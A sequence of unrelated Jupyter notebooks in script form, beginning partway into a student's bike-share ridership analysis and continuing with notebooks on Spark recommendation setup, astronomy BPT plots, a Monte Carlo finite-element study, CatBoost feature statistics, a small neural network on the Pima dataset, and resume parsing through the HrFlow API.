n_subscribers, n_customers, n_total =list(number_of_trips(path))[0],list(number_of_trips(path))[1],list(number_of_trips(path))[2]
print(path.split("/")[2].split("-")[0])
print("Total Number of Trips:",n_total)
print("proportion of trips made by subscribers:",n_subscribers/n_total)
print("proportion of trips made by short-term customers:",n_customers/n_total)
print()
#
# Now, you will write your own code to continue investigating properties of the data.
#
# **Question 4b**: Bike-share systems are designed for riders to take short trips. Most of the time, users are allowed to take trips of 30 minutes or less with no additional charges, with overage charges made for trips of longer than that duration. What is the average trip length for each city? What proportion of rides made in each city are longer than 30 minutes?
#
# **Answer**: The average trip length for Washington is 18.93(min),the proportion of rides made are longer than 30 minutes is 10.84%
# The average trip length for NYC is 15.81(min),the proportion of rides made are longer than 30 minutes is 7.30%
# The average trip length for Chicago is 16.56(min),the proportion of rides made are longer than 30 minutes is 8.33%
# +
def length_of_trips(filename):
"""
Reads in a file with trip data and return the number of
trips made by subscribers, customers, and total overall.
"""
with open(filename, 'r') as f_in:
reader = csv.DictReader(f_in) # set up csv reader object
n_shortride = 0
n_longride= 0
len_total=0
for row in reader:
if float(row['duration']) <= 30:
n_shortride += 1
else:
n_longride += 1
len_total+=float(row['duration'])
# compute total number of rides
n_total = n_shortride + n_longride
avg_len = len_total/n_total
pcr_longride = n_longride/n_total
pcr_shortride = n_shortride/n_total
# return tallies as a tuple
return(len_total, n_total,avg_len,pcr_longride,pcr_shortride)
data_file = ['./data/Washington-2016-Summary.csv','./data/NYC-2016-Summary.csv','./data/Chicago-2016-Summary.csv']
for path in data_file:
len_total, n_total,avg_len,pcr_longride,pcr_shortride=length_of_trips(path)
city_name=path.split("/")[2].split("-")[0]
print("The average trip length for {} is {:.2f}(min) the proportion of rides made are longer than 30 minutes is {:.2f}%".format(city_name,avg_len,pcr_longride*100))
# -
# **Question 4c**: Dig deeper into the question of trip duration based on ridership. Choose one city. Within that city, which type of user takes longer rides on average: Subscribers or Customers?
#
# **Answer**:The customer's in Washington takes longer rides on average.The average Subscriber trip duration is 13.68 (min), The average customer trip duration is 32.78 (min)
# +
##trip=number_of_trips(data_file)
if number_of_trips(data_file)[5] > number_of_trips(data_file)[6]:
print('The subscriber\'s in Washington takes longer rides on average. The average Subscriber trip duration is {:.2f} (min),The average customer trip duration is {:.2f} (min)'.format(number_of_trips(data_file)[5],number_of_trips(data_file)[6]))
else:
print('The customer\'s in Washington takes longer rides on average.The average Subscriber trip duration is {:.2f} (min), The average customer trip duration is {:.2f} (min)'.format(number_of_trips(data_file)[5],number_of_trips(data_file)[6]))
# -
# <a id='visualizations'></a>
# ### Visualizations
#
# The last set of values that you computed should have pulled up an interesting result. While the mean trip time for Subscribers is well under 30 minutes, the mean trip time for Customers is actually _above_ 30 minutes! It will be interesting for us to look at how the trip times are distributed. In order to do this, a new library will be introduced here, `matplotlib`. Run the cell below to load the library and to generate an example plot.
# +
# load library
import matplotlib.pyplot as plt
# %matplotlib inline
# example histogram, data taken from bay area sample
data = [ 7.65, 8.92, 7.42, 5.50, 16.17, 4.20, 8.98, 9.62, 11.48, 14.33,
19.02, 21.53, 3.90, 7.97, 2.62, 2.67, 3.08, 14.40, 12.90, 7.83,
25.12, 8.30, 4.93, 12.43, 10.60, 6.17, 10.88, 4.78, 15.15, 3.53,
9.43, 13.32, 11.72, 9.85, 5.22, 15.10, 3.95, 3.17, 8.78, 1.88,
4.55, 12.68, 12.38, 9.78, 7.63, 6.45, 17.38, 11.90, 11.52, 8.63,]
plt.hist(data)
plt.title('Distribution of Trip Durations')
plt.xlabel('Duration (m)')
plt.show()
# -
# In the above cell, we collected fifty trip times in a list, and passed this list as the first argument to the `.hist()` function. This function performs the computations and creates plotting objects for generating a histogram, but the plot is actually not rendered until the `.show()` function is executed. The `.title()` and `.xlabel()` functions provide some labeling for plot context.
#
# You will now use these functions to create a histogram of the trip times for the city you selected in question 4c. Don't separate the Subscribers and Customers for now: just collect all of the trip times and plot them.
# +
def list_trips(filename):
"""
Reads in a file with trip data and Return the trip durations.
"""
tripdata=[]
with open(filename, 'r') as f_in:
reader = csv.DictReader(f_in)
for row in reader:
tripdata.append(float(row['duration']))
return tripdata
data_file = './data/NYC-2016-Summary.csv'
bins =[x for x in range(0,125,10)]
plt.hist(list_trips(data_file),bins)
plt.title('Distribution of NYC Trip Durations')
plt.xlabel('Duration (m)')
plt.show()
# -
# If you followed the use of the `.hist()` and `.show()` functions exactly like in the example, you're probably looking at a plot that's completely unexpected. The plot consists of one extremely tall bar on the left, maybe a very short second bar, and a whole lot of empty space in the center and right. Take a look at the duration values on the x-axis. This suggests that there are some highly infrequent outliers in the data. Instead of reprocessing the data, you will use additional parameters with the `.hist()` function to limit the range of data that is plotted. Documentation for the function can be found [[here]](https://matplotlib.org/devdocs/api/_as_gen/matplotlib.pyplot.hist.html#matplotlib.pyplot.hist).
#
# **Question 5**: Use the parameters of the `.hist()` function to plot the distribution of trip times for the Subscribers in your selected city. Do the same thing for only the Customers. Add limits to the plots so that only trips of duration less than 75 minutes are plotted. As a bonus, set the plots up so that bars are in five-minute wide intervals. For each group, where is the peak of each distribution? How would you describe the shape of each distribution?
#
# **Answer**:For NYC Customer Trip Durations, the peak is in 20-25 mins bin. for NYC Customer Trip Durations, the peak is in 5-10 mins bin. Both histogram are right skewed.
# +
substriber_data=[]
customer_data=[]
def list_trips(filename):
with open(filename, 'r') as f_in:
# set up csv reader object
reader = csv.DictReader(f_in)
# tally up ride types
for row in reader:
if row['user_type'] == 'Subscriber':
substriber_data.append(float(row['duration']))
else:
customer_data.append(float(row['duration']))
return (substriber_data,customer_data)
data_file = './data/NYC-2016-Summary.csv'
bins =[x for x in range(0,75,5)]
plt.hist(list_trips(data_file)[0],bins)
plt.title('Distribution of NYC Subscriber Trip Durations')
plt.xlabel('Duration (m)')
plt.show()
plt.hist(list_trips(data_file)[1],bins)
plt.title('Distribution of NYC Customer Trip Durations')
plt.xlabel('Duration (m)')
plt.show()
# -
# <a id='eda_continued'></a>
# ## Performing Your Own Analysis
#
# So far, you've performed an initial exploration into the data available. You have compared the relative volume of trips made between three U.S. cities and the ratio of trips made by Subscribers and Customers. For one of these cities, you have investigated differences between Subscribers and Customers in terms of how long a typical trip lasts. Now it is your turn to continue the exploration in a direction that you choose. Here are a few suggestions for questions to explore:
#
# - How does ridership differ by month or season? Which month / season has the highest ridership? Does the ratio of Subscriber trips to Customer trips change depending on the month or season?
# - Is the pattern of ridership different on the weekends versus weekdays? On what days are Subscribers most likely to use the system? What about Customers? Does the average duration of rides change depending on the day of the week?
# - During what time of day is the system used the most? Is there a difference in usage patterns for Subscribers and Customers?
#
# If any of the questions you posed in your answer to question 1 align with the bullet points above, this is a good opportunity to investigate one of them. As part of your investigation, you will need to create a visualization. If you want to create something other than a histogram, then you might want to consult the [Pyplot documentation](https://matplotlib.org/devdocs/api/pyplot_summary.html). In particular, if you are plotting values across a categorical variable (e.g. city, user type), a bar chart will be useful. The [documentation page for `.bar()`](https://matplotlib.org/devdocs/api/_as_gen/matplotlib.pyplot.bar.html#matplotlib.pyplot.bar) includes links at the bottom of the page with examples for you to build off of for your own use.
#
# **Question 6**: Continue the investigation by exploring another question that could be answered by the data available. Document the question you want to explore below. Your investigation should involve at least two variables and should compare at least two groups. You should also use at least one visualization as part of your explorations.
#
# **Answer**:Ridership differ by season and city, and winter in three city has the fewest ridership.
# 
# And, the"ratio Ratio of Subscriber trips to Customer trips bar chart", winter has the highest ratio of Subscriber trips to Customer trips.
# +
import matplotlib.pyplot as plt
import numpy as np
def month_of_trips(filename):
with open(filename, 'r') as f_in:
reader = csv.DictReader(f_in)# set up csv reader object
winter =[12,1,2]
spring =[3,4,5]
summer =[6,7,8]
autumn = [9,10,11]
# initilization
#for subscriber
winter_sub = 0
spring_sub = 0
summer_sub = 0
autumn_sub = 0
#for coustemer
winter_cus = 0
spring_cus = 0
summer_cus = 0
autumn_cus = 0
#convert the data
for row in reader:
if row['user_type'] == 'Subscriber':
if int(row['month']) in winter:
winter_sub += 1
elif int(row['month']) in spring:
spring_sub += 1
elif int(row['month']) in summer:
summer_sub += 1
else:
autumn_sub += 1
else:
if int(row['month']) in winter:
winter_cus += 1
elif int(row['month']) in spring:
spring_cus += 1
elif int(row['month']) in summer:
summer_cus += 1
else:
autumn_cus += 1
subscriber_season ={"Winter": winter_sub,"Spring": spring_sub,"Summer": summer_sub, "Autumn":autumn_sub}
customer_season = {"Winter": winter_cus,"Spring": spring_cus,'Summer': summer_cus,'Autumn': autumn_cus}
n = {"Winter":winter_sub+winter_cus,"Spring": spring_sub+spring_cus,'Summer': summer_sub+summer_cus,'Autumn':autumn_sub+ autumn_cus}
return subscriber_season,customer_season,n
data_file = ['./data/Washington-2016-Summary.csv','./data/NYC-2016-Summary.csv', './data/Chicago-2016-Summary.csv']
for path in data_file:
city_name=path.split("/")[2].split("-")[0]
subscriber_season, customer_season,n = month_of_trips(path)
maximum =max(n, key=n.get)
maximum_sub = max(subscriber_season, key=subscriber_season.get)
print("{}: {} has the highest ridership, which is {}, and {} has the highest subscriber ridership, which is {}"
.format(city_name,maximum, n[maximum],maximum_sub, subscriber_season[maximum_sub]))
x = [ k for k in subscriber_season ]
y = [v for v in subscriber_season.values()]
x_pos =np.arange(len(x))
x2 = [ k for k in customer_season]
y2 = [v for v in customer_season.values()]
x2_pos =[i for i in range(len(x2))]
plt.bar(x_pos,y, label ='Subscriber', color = 'r')
plt.bar(x2_pos,y2, label ='Customer', color ='b')
plt.title('Chicago Subscriber & Customer Rideship Bar Charts')
plt.xlabel('Seasons')
plt.ylabel('Number of Trips')
plt.xticks(x_pos, ("Winter", "Spring","Summer","Autumn"))
plt.show()
ratio = [subscriber_season["Winter"]/customer_season["Winter"],
subscriber_season["Spring"]/customer_season["Spring"],
subscriber_season["Summer"]/customer_season["Summer"],
subscriber_season["Autumn"]/customer_season["Autumn"]]
x3 = [1,2,3,4]
y3 = [v for v in ratio]
plt.bar(x3,y3, label ='Ratio',color ='aqua')
plt.xticks(x3, ("Winter", "Spring","Summer","Autumn"))
plt.title('Ratio of Subscriber trips to Customer trips')
plt.show()
# -
# <a id='conclusions'></a>
# ## Conclusions
#
# Congratulations on completing the project! This is only a sampling of the data analysis process: from generating questions, wrangling the data, and to exploring the data. Normally, at this point in the data analysis process, you might want to draw conclusions about the data by performing a statistical test or fitting the data to a model for making predictions. There are also a lot of potential analyses that could be performed on the data which are not possible with only the data provided. For example, detailed location data has not been investigated. Where are the most commonly used docks? What are the most common routes? As another example, weather has potential to have a large impact on daily ridership. How much is ridership impacted when there is rain or snow? Are subscribers or customers affected more by changes in weather?
#
# **Question 7**: Putting the bike share data aside, think of a topic or field of interest where you would like to be able to apply the techniques of data science. What would you like to be able to learn from your chosen subject?
#
# **Answer**: i would like to apply the similar techniques in human activity data. it will aloow to predict or know about what we are gooing to do when we are in some place or travelling,etc. I can create a chart to know what a person do the most and know about that person and provide services that fits most for him.
#
from subprocess import call
call(['python', '-m', 'nbconvert', 'Bike_Share_Analysis.ipynb'])
|
Explore-US-Bikeshare-Data/Bike_Share_Analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Set up Spark
import findspark
findspark.init()
from pyspark import SparkContext, SparkConf, SQLContext
from pyspark.sql import SparkSession
conf=SparkConf().setAppName('ALS').setMaster('local')
sc=SparkContext.getOrCreate(conf=conf)
spark = SparkSession(sc)
# ## Import libraries
from matplotlib import pyplot as plt
from matplotlib.ticker import MaxNLocator
from pyspark.ml.recommendation import ALS
from pyspark.ml.evaluation import RegressionEvaluator
from pyspark.sql.types import IntegerType
from pyspark.sql.types import FloatType
from sklearn.metrics import ndcg_score
import pandas as pd
import numpy as np
import math
# ## Load Data
# +
path = "D:/Rutgers - MSCS/2nd Sem/CS550 (DM)/Proj/Data/movies.csv"
try:
file_df = spark.read.csv(path, header=True)
print("Pyspark Finish Loading")
except:
spark.stop()
print("ERROR")
|
jupyterNotebooks/Prediction.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
for sample in range(23):
maps = Maps(plateifu=plateifu_list[sample])
# make a standard 3-plot BPT and retrieve the classifications
masks, fig, axes = maps.get_bpt()
fig.suptitle(str(sample)+'_'+plateifu_list[sample]+'_BPT',fontsize=18,y=0.95)
fig.savefig('./BPT/'+str(sample)+'_'+plateifu_list[sample]+'.png')
|
bpt.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Monte Carlo simulation for Coefficient 2
#
#
# +
import os
import sys
import numpy as np
import scipy.sparse as sparse
import scipy.stats as stats
import random
import csv
# %matplotlib notebook
import matplotlib.pyplot as plt
from visualize import drawCoefficient
from data import *
from gridlod import interp, coef, util, fem, world, linalg, femsolver
import pg_rand, femsolverCoarse, buildcoef2d
from gridlod.world import World
# -
# ## Result function
def result(pglod, world, CoefClass, A, f, MC=1, prob=100):
NWorldFine = world.NWorldFine
NWorldCoarse = world.NWorldCoarse
NCoarseElement = world.NCoarseElement
boundaryConditions = world.boundaryConditions
NpFine = np.prod(NWorldFine+1)
NpCoarse = np.prod(NWorldCoarse+1)
plist = [0,5,10,20,30,100]
#### initial #####
xmLoda = np.zeros([MC,np.size(plist)])
xmVcLoda = np.zeros([MC,np.size(plist)])
xmLodVcLoda = np.zeros([MC,np.size(plist)])
ems = []
plottingx = np.zeros([MC-1,np.size(plist)])
plottingy = np.zeros([MC-1,np.size(plist)])
plottingz = np.zeros([MC-1,np.size(plist)])
plotting2x = np.zeros([MC-1,np.size(plist)])
plotting2y = np.zeros([MC-1,np.size(plist)])
plotting2z = np.zeros([MC-1,np.size(plist)])
plotting3x = np.zeros([MC-1,np.size(plist)])
plotting3y = np.zeros([MC-1,np.size(plist)])
plotting3z = np.zeros([MC-1,np.size(plist)])
for i in range(0,MC):
print '_____Sample__ ' + str(i+1) + '/' + str(MC) + ' ____'
R = CoefClass.RandomVanish( probfactor = prob,
PartlyVanish = None,
Original = True)
ANew = R.flatten()
###### Reference solution ######
f_fine = np.ones(NpFine)
uFineFem, AFine, MFine = femsolver.solveFine(world, ANew, f_fine, None, boundaryConditions)
Anew = coef.coefficientFine(NWorldCoarse, NCoarseElement, ANew)
###### tolerance = 0 without computing ######
vis, eps = pglod.updateCorrectors(Anew, 0, f, 1, clearFineQuantities=False, mc=True, Computing=None)
print 'Affected correctors: ' + str(np.sum(vis))
##### VCLOD ######
uVc = []
updated = 0
for p in plist:
print 'p = ' + str(p) + '%',
uVcLod, updated = VcLod(pglod, world, Anew, eps, updated, numberofcorrectors=p)
if p == 100:
uLod = uVcLod
pglod.CorrectorsToOrigin()
else:
uVc.append(uVcLod)
for k in range(0,np.shape(uVc)[0]):
uVcLod = uVc[k]
eVcLod = np.sqrt(np.dot(uFineFem - uVcLod, MFine*(uFineFem - uVcLod))) / np.sqrt(np.dot(uFineFem, MFine*uFineFem))
eLodVcLod = np.sqrt(np.dot(uVcLod - uLod, MFine*(uVcLod - uLod))) / np.sqrt(np.dot(uLod, MFine*uLod))
eLod = np.sqrt(np.dot(uFineFem - uLod, MFine*(uFineFem - uLod))) / np.sqrt(np.dot(uFineFem, MFine*uFineFem))
xmLoda[i,k] = eLod
xmVcLoda[i,k] = eVcLod
xmLodVcLoda[i,k] = eLodVcLod
if i == 0:
continue
ems.append(i+1)
for k in range(0,np.shape(uVc)[0]):
muLod = 0
muVcLod = 0
muLodVcLod = 0
for j in range(0,i+1):
muLod += xmLoda[j,k]
muVcLod += xmVcLoda[j,k]
muLodVcLod += xmLodVcLoda[j,k]
muLod /= i+1
muVcLod /= i+1
muLodVcLod /= i+1
sig2Lod = 0
sig2VcLod = 0
sig2LodVcLod = 0
for j in range(0,i+1):
sig2Lod += (xmLoda[j,k]-muLod)**(2)
sig2VcLod += (xmVcLoda[j,k]-muVcLod)**(2)
sig2LodVcLod += (xmLodVcLoda[j,k]-muLodVcLod)**(2)
sig2Lod /= i
sig2VcLod /= i
sig2LodVcLod /= i
a = [np.sqrt(sig2Lod)/np.sqrt(i+1)*1.96,np.sqrt(sig2VcLod)/np.sqrt(i+1)*1.96,np.sqrt(sig2LodVcLod)/np.sqrt(i+1)*1.96]
mum = [muLod,muVcLod,muLodVcLod]
plottingx[i-1,k] = mum[0]-a[0]
plottingy[i-1,k] = mum[0]
plottingz[i-1,k] = mum[0]+a[0]
plotting2x[i-1,k] = mum[1]-a[1]
plotting2y[i-1,k] = mum[1]
plotting2z[i-1,k] = mum[1]+a[1]
plotting3x[i-1,k] = mum[2]-a[2]
plotting3y[i-1,k] = mum[2]
plotting3z[i-1,k] = mum[2]+a[2]
Matrix = CoefClass.Matrix.flatten()
ROOT = '../test_data/MonteCarlo/Coef2/p' + str(100/prob) + '/' + str(plist[k])
safer(ROOT, mum, a, plottingx[:,k], plottingy[:,k], plottingz[:,k], plotting2x[:,k], plotting2y[:,k], plotting2z[:,k], plotting3x[:,k], plotting3y[:,k], plotting3z[:,k], ems, Matrix)
return a,mum
# ## VC-LOD
def VcLod(pglod, world, Anew, eps, updated = 0,
numberofcorrectors=5):
NWorldFine = world.NWorldFine
NWorldCoarse = world.NWorldCoarse
NCoarseElement = world.NCoarseElement
boundaryConditions = world.boundaryConditions
NpFine = np.prod(NWorldFine+1)
NpCoarse = np.prod(NWorldCoarse+1)
##### tolerance = certain ######
eps = filter(lambda x: x!=0, eps)
eps.sort()
epssize = np.size(eps)
until = int(round((numberofcorrectors/100. * epssize) +0.49,0))
if epssize != 0:
until = int(round((until * 256./epssize)+0.49,0))
tolrev = []
for i in range(epssize-1,-1,-1):
tolrev.append(eps[i])
if epssize == 0:
print 'nothing to update'
else:
if until >= epssize:
tol = 0
else:
tol = tolrev[until]
vistol = pglod.updateCorrectors(Anew, tol, f, clearFineQuantities=False, mc=True, Testing=True)
updated += np.sum(vistol)
print 'Updated correctors: ' + str(updated)
KFull = pglod.assembleMsStiffnessMatrix()
MFull = fem.assemblePatchMatrix(NWorldCoarse, world.MLocCoarse)
free = util.interiorpIndexMap(NWorldCoarse)
bFull = MFull*f
KFree = KFull[free][:,free]
bFree = bFull[free]
xFree = sparse.linalg.spsolve(KFree, bFree)
basis = fem.assembleProlongationMatrix(NWorldCoarse, NCoarseElement)
basisCorrectors = pglod.assembleBasisCorrectors()
modifiedBasis = basis - basisCorrectors
xFull = np.zeros(NpCoarse)
xFull[free] = xFree
uCoarse = xFull
uVcLod = modifiedBasis*xFull
return uVcLod, updated
# +
#background
bg = 0.05
#values
val = 1
random.seed(20)
#fine World
NWorldFine = np.array([256, 256])
NpFine = np.prod(NWorldFine+1)
#coarse World
NWorldCoarse = np.array([16,16])
NpCoarse = np.prod(NWorldCoarse+1)
#ratio between Fine and Coarse
NCoarseElement = NWorldFine/NWorldCoarse
boundaryConditions = np.array([[0, 0],
[0, 0]])
world = World(NWorldCoarse, NCoarseElement, boundaryConditions)
#righthandside
f = np.ones(NpCoarse)
#coefficient 2
CoefClass = buildcoef2d.Coefficient2d(NWorldFine,
bg = bg,
val = val,
length = 1,
thick = 1,
space = 2,
probfactor = 1,
right = 0,
down = 0,
diagr1 = 0,
diagr2 = 0,
diagl1 = 0,
diagl2 = 0,
LenSwitch = None,
thickSwitch = None,
equidistant = True,
ChannelHorizontal = None,
ChannelVertical = True,
BoundarySpace = True)
A = CoefClass.BuildCoefficient()
ABase = A.flatten()
plt.figure("OriginalCoefficient")
drawCoefficient(NWorldFine, ABase)
plt.title('Original coefficient')
k = 4
###### precompute #######
NWorldFine = world.NWorldFine
NWorldCoarse = world.NWorldCoarse
NCoarseElement = world.NCoarseElement
boundaryConditions = world.boundaryConditions
NpFine = np.prod(NWorldFine+1)
NpCoarse = np.prod(NWorldCoarse+1)
#interpolant
IPatchGenerator = lambda i, N: interp.L2ProjectionPatchMatrix(i, N, NWorldCoarse, NCoarseElement, boundaryConditions)
#old Coefficient (need flatten form)
ABase = A.flatten()
Aold = coef.coefficientFine(NWorldCoarse, NCoarseElement, ABase)
pglod = pg_rand.VcPetrovGalerkinLOD(Aold, world, k, IPatchGenerator, 0)
pglod.originCorrectors(clearFineQuantities=False)
#Perturbations
print '_____________ 1% Perturbations __________'
prob = 100
MC = 100
a, mum = result(pglod, world, CoefClass, A, f, MC, prob)
#Perturbations
print '_____________ 2% Perturbations __________'
prob = 50
MC = 100
a, mum = result(pglod, world, CoefClass, A, f, MC, prob)
|
notebooks/TEST_MonteCarlo_Coefficient_2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
import catboost
import numpy as np
import pandas as pd
from sklearn.datasets import make_regression
# %pylab inline
# ### Example on generated data
# +
n_features = 3
X, y = make_regression(n_samples=1000, n_features=10, n_informative=n_features, random_state=0)
plt.scatter(X[:, 0], X[:, 1], c=y)
X = pd.DataFrame(X)
X.columns = ['Column_{}'.format(i) for i in range(X.shape[1])]
cat_values_1 = ['A', 'B', 'C']
cat_values_2 = ['some', 'random', 'categorical', 'feature', 'values', 'testing']
X.loc[:, 'CatColumn_1'] = [cat_values_1[np.random.randint(0, len(cat_values_1))] for _ in range(X.shape[0])]
X.loc[:, 'CatColumn_2'] = [cat_values_2[np.random.randint(0, len(cat_values_2))] for _ in range(X.shape[0])]
# -
X.sample(3)
# ### Train model and plot statistics
model = catboost.CatBoostRegressor(cat_features=['CatColumn_1', 'CatColumn_2'],
one_hot_max_size=300, iterations=500)
model.fit(X, y, silent=True)
# #### Float feature
feature_num = 'Column_3'
res = model.calc_feature_statistics(X, y, feature_num, plot=True)
# #### One-Hot feature
feature_num = 'CatColumn_2'
res = model.calc_feature_statistics(X, y, feature_num, cat_feature_values=cat_values_2, plot=True)
# ### Test on Titanic dataset
# +
from catboost.datasets import titanic
titanic_train, titanic_test = titanic()
titanic_train_target = titanic_train.Survived
titanic_train.drop(['PassengerId', 'Survived', 'Name', 'Parch', 'Ticket', 'Cabin', 'Embarked'], axis=1, inplace=True)
titanic_train.head(3)
# -
titanic_model = catboost.CatBoostClassifier(
iterations=200,
cat_features=['Pclass', 'Sex', 'SibSp'],
one_hot_max_size=10)
titanic_model.fit(titanic_train, titanic_train_target, silent=True)
titanic_train.dtypes
# #### Float feature
feature = 'Fare'
res = titanic_model.calc_feature_statistics(titanic_train, titanic_train_target, feature, plot=True)
# #### One-hot feature
feature = 'Sex'
res = titanic_model.calc_feature_statistics(titanic_train, titanic_train_target, feature, plot=True)
|
catboost/tutorials/model_analysis/feature_statistics_tutorial.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import MLP_v5
from sklearn.model_selection import train_test_split
from keras.utils import to_categorical
data = np.genfromtxt('PIMA_Indian.csv', delimiter = ',')
features = np.zeros((768,8), dtype = np.float32)
labels = np.zeros((768,1), dtype = np.float32)
for i in range(768):
for j in range(8):
features[i][j] = data[i][j]
for i in range(768):
labels[i] = data[i][8]
labels = to_categorical(labels, num_classes = 2)
train_x, test_x, train_y, test_y = train_test_split(features, labels, test_size = 0.2, random_state = 42)
print('Train images shape = '+str(train_x.shape))
print('Train labels shape = '+str(train_y.shape))
print('Test images shape = '+str(test_x.shape))
print('Test images shape = '+str(test_y.shape))
_, weights = MLP_v5.Dense(2, train_x, train_y, 10000)
MLP_v5.evaluate(test_x, test_y, weights)
|
MLP_v5 with Pima Indian Dataset.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="AZdfdAQSt7hZ"
# ##### Copyright 2020 HrFlow's AI Research Department
#
# Licensed under the Apache License, Version 2.0 (the "License");
# + id="QNgz5iA-uD4E"
# Copyright 2020 HrFlow's AI Research Department. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# + [markdown] id="ijYNoliXuIKP"
# <p>
# <table align="left"><td>
# <a target="_blank" href="https://colab.research.google.com/github/Riminder/python-hrflow-api/blob/master/examples/colab/build_personalized_ai_hr_models.ipynb">
# <img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab
# </a>
# </td><td>
# <a target="_blank" href="https://github.com/Riminder/python-hrflow-api/blob/master/examples/colab/build_personalized_ai_hr_models.ipynb">
# <img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
# </td><td>
# <a target="_blank" href="https://www.hrflow.ai/book-us">
# <img width=32px src="https://gblobscdn.gitbook.com/spaces%2F-M1L6Hspq8r9LXd5_gIC%2Favatar-1586188377926.png?generation=1586188378327930&alt=media" />Get an account</a>
# </td></table>
# <br>
# </p>
# + [markdown] id="FtpcP2wIAu_K"
# <p>
# <table align="center">
# <td>
# <a target="_blank" href="https://developers.hrflow.ai/ai-layers/embedding">
# <img width=800px img src="https://lh3.googleusercontent.com/JXagdsThZxaEKwjE83-QrJXjB1r1tk2-KmdBzb94X_a238-5bNtwHuDi-PUA4_cVBkpaCie1uil6lPDNhdggpZhkgiZBYQGe4iKRRGo13XvyYgzuG9Vw_fv72LiYrg2am9MIrPnkwlQ"/>
# </a>
# </td>
# </table>
# </p>
# + [markdown] id="PfFOG5klschh"
# Advantages of HrFlow.ai Embedding API:
#
# - **Save 90% of R&D time** spent on features engineering
#
# - Train with **limited amount of labels**
#
# - Increase inference **speed up to 26x**
#
# - **Limit the memory** footprint on production up to **300x**
# + [markdown] id="GuxYCkCJuYD7"
# # Getting Started
# This section sets up the environment to get access to **HrFlow Profile API** and sets up a connection to HrFlow.
# + id="KyHzNdpwuYnz"
# Machine Learning and Classification Libs
# !pip install --quiet tensorflow
# !pip install --quiet matplotlib
# !pip install --quiet pandas
# !pip install --quiet seaborn
# !pip install --quiet plotly
# !pip install --quiet tqdm
# HrFlow Dependencies
# !pip install --quiet python-magic
# !pip install --quiet hrflow
# + [markdown] id="8T8m_Vraucti"
# An **API Key** is required here. You can get your API Key at **https://```<your-sub domain/>```.hrflow.ai/settings/api/keys** or ask us for a **demo API Key**.
# + id="lZOVElmBudpi"
import pprint
from hrflow import Hrflow
from getpass import getpass
# Credentials
api_secret = getpass(prompt="Please Enter Your API Secret Key")
client = Hrflow(api_secret=api_secret)
# Hrflow Synchronous Source
source_key = getpass(prompt="Please Enter a Synchronous source_key")
# + id="xMrGTO1pwvGN"
import os
import pickle
from google.colab import drive
drive.mount('/content/drive', force_remount=True)
# + [markdown] id="pbHmEEbGukre"
# # 1. Building Dataset
#
# Dataset Folders Tree Structure:
# - webinar/dataset/
# - resume/
# - data_scientist/
# - executive_manager/
# - profile/
# - data_scientist/
# - executive_manager/
# - embedding/
# - data_scientist/
# - executive_manager/
# + [markdown] id="1lE9oxNVuu6n"
# ## 1.1. Setting Dataset Root
# + id="9Fnx5BVP8rQ5"
def build_path(path):
recursive_path = ""
for folder in path.split("/"):
recursive_path = os.path.join(recursive_path, folder)
if not os.path.isdir(recursive_path):
os.mkdir(recursive_path)
# + id="YCzltHHNumh5"
import os
# Dataset Root Folder
DATASET_ROOT = "drive/My Drive/webinar/dataset"
# Resume Folder
data_scientist_resume_folder = os.path.join(DATASET_ROOT, "resume", "data_scientist")
executive_manager_resume_folder = os.path.join(DATASET_ROOT, "resume", "executive_manager")
# Parsing Folder
data_scientist_parsing_folder = os.path.join(DATASET_ROOT, "parsing", "data_scientist")
executive_manager_parsing_folder = os.path.join(DATASET_ROOT, "parsing", "executive_manager")
build_path(data_scientist_parsing_folder)
build_path(executive_manager_parsing_folder)
# Profile Folder
data_scientist_profile_folder = os.path.join(DATASET_ROOT, "profile", "data_scientist")
executive_manager_profile_folder = os.path.join(DATASET_ROOT, "profile", "executive_manager")
build_path(data_scientist_profile_folder)
build_path(executive_manager_profile_folder)
# Embedding Folder
data_scientist_embedding_folder = os.path.join(DATASET_ROOT, "embedding", "data_scientist")
executive_manager_embedding_folder = os.path.join(DATASET_ROOT, "embedding", "executive_manager")
build_path(data_scientist_embedding_folder)
build_path(executive_manager_embedding_folder)
# + id="hGM0JvnuxneB"
print(os.listdir(data_scientist_resume_folder))
# + [markdown] id="L5nKOIeBu22o"
# ## 1.2. Parsing Resumes
# + id="TLKLexusutvt"
import json
from tqdm import tqdm
for folder, target_folder in [(data_scientist_resume_folder, data_scientist_parsing_folder), (executive_manager_resume_folder, executive_manager_parsing_folder)]:
file_names = os.listdir(folder)
for file_name in tqdm(file_names):
# Sending File for Parsing
file_path = os.path.join(folder, file_name)
with open(file_path, "rb") as file:
profile = file.read()
response = client.profile.parsing.add_file(source_key=source_key,
profile_file=profile,
sync_parsing=1)
profile_parsing = response.get("data").get("parsing")
# Saving Parsed Result
target_path = os.path.join(target_folder, file_name.split(".")[0])
with open(target_path,"w") as file:
json.dump(profile_parsing, file)
